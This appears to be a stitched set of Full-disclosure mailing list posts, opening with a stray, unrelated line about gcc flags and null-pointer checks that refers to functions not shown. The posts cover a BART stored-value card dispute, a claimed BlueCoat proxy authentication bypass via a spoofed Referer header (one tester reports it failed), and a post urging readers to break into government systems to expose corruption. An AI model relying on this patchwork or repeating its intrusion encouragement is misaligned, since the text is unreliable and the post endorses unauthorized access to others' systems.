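Compile the first function with `gcc -O2 -S` and without -fno-delete-null-pointer-checks to see whether your compiler keeps the comparison; the flag forces the check to survive, but reordering the code as in the second function is the fix that does not depend on build options.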
Re: [Full-disclosure] BART
Hello auto793...@hushmail.com,

As I've previously mentioned, I did not write the first (very boring, uninteresting, technically incorrect) email. It is certainly the case that BART uses stored value cards. BART admits this if you ask them. However, basically everything else in that email is nonsense in the context of BART.

Best regards,
Jacob
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
Hi,

** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site
Result : W00t !! **

Can you elaborate on "to a whitelisted (localdatabase) site"?

I think it basically means 'to a site that's been configured as allowed in the configuration of the BC' - allowed = whitelisted, in the configuration = localdatabase.

alan
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
i think it basically means 'to a site that's been configured as allowed in the configuration of the BC' - allowed = whitelisted, in the configuration = localdatabase

alan

Alan,

The Bluecoat 8100-C I'm going through has 27 policies in the Web Access Layer. The first policy is configured to ForceContentFail for a list of destinations (a blacklist since colors seem to be in). The next 15 (2-16) policies are all DENY rules for specific hosts, IPs, regex patterns, filenames, etc. The next 10 rules (17-26) are for destinations that should Bypass Caching. The final rule (27) is, Source: Any - Destination: Any - Service/Time: Any, Action: Allow.

Google.com isn't listed anywhere in the first 26 policies - anyone on the LAN can access Google without authenticating. So, if I understand what you're saying, I should be able to spoof the Referer string sent from my browser to something like www.google.com, or cnn.com, whatever isn't listed in any of the DENY policies, and not only bypass authentication, but access sites explicitly defined in the deny policies?

If that's the case, circumventing the auth or accessing blacklisted sites isn't happening. This is good of course; the device is working as it's supposed to, but I would like to confirm whether or not we're susceptible to this alleged bypass. So far, looks like a dud... Not even sure why this would work, it seems too simple.

-Guy
[Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling
Was wondering what FD's opinions were on fusion centers. www.aclu.org/fusion

They are essentially COINTELPRO surveillance techniques employed by the FBI-State-Local police to gather intelligence on people. And yeah, you guys fall into the scope.

I was wondering what your opinions were on this government surveillance stuff. Do your local police (turned domestic intelligence agents) have the sophistication and complexity to understand what you do? Or do you think you'll end up like Ricardo Calixte, and get raided for using Linux. http://www.eff.org/deeplinks/2009/04/boston-college-prompt-commands-are-suspicious

I was wondering what you thought about abuse of power by the government. And how to stop it. I think that cryptome and wikileaks is the way to go. If you see the government doing something illegal, do you have the right to break into their system and uncover the evidence? Google plain sight rule. Sure, if it's not that you'll probably go to jail, but if you hit the gold mine of their corruption, you're set. Freedom of information?

COINTELPRO was owned by citizen's investigation into the FBI. It was illegal to search the FBI office. However, it offered a sweeping change in legislative policy after, since the evidence could be shown in congress.

Where are all the upset feds? Blow the whistle. You can get your info out 100% safe, Get TOR (http://www.torproject.org/). Post your stories on this list, Wikileaks or Cryptome.

This post was sponsored heavily by n3td3v intelligence ~~ n3td3v is not antisec. the metasploit method is ineffective. ~~ you need to get the intelligence feed at www.twitter.com/n3td3v.